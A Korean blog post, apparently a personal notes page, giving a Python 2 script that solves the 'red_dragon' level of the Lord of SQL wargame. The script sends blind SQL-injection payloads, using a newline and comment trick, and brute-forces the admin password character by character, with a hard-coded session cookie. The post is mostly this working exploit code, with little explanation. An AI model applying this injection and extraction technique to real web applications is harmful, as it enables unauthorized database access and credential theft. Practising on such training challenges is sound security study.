LOS2 red_dragon

Wargame/Lord of SQL 2018. 10. 10. 09:20
import requests

def request(payload_1,payload_2):
url = "http://los.rubiya.kr/red_dragon_b787de2bfe6bc3454e2391c4e7bb5de8.php"
params = {'id':payload_1,'no':payload_2}
headers = {'Cookie':'PHPSESSID=fnlt2l775q0o8folhtjp84pqg5'}
response = requests.get(url,params=params,headers=headers)
if "Hello admin" in response.text:
return True
else:
return False

payload_1 = "'||pw>#"
payload_2 = "\n0x"
for j in range(0,100):
for i in range(32,128):
if request(payload_1,payload_2+hex(i).replace("0x","")) == False:
payload_2 += hex(i-1).replace("0x","")
break
if i == 127:
break

pw = hex(int(payload_2,16)+1)
print "Find Pw[*] = " + pw[2:len(pw)-1].decode("hex").lower()


'Wargame > Lord of SQL' 카테고리의 다른 글

LOS2 frankenstein  (0) 2018.10.10
LOS2 blue_dragon  (0) 2018.10.10
LOS2 green_dragon  (0) 2018.10.10
LOS2 evil_wizard  (0) 2018.10.10
LOS2 hell_fire  (0) 2018.10.10
블로그 이미지

JeonYoungSin

메모 기록용 공간

,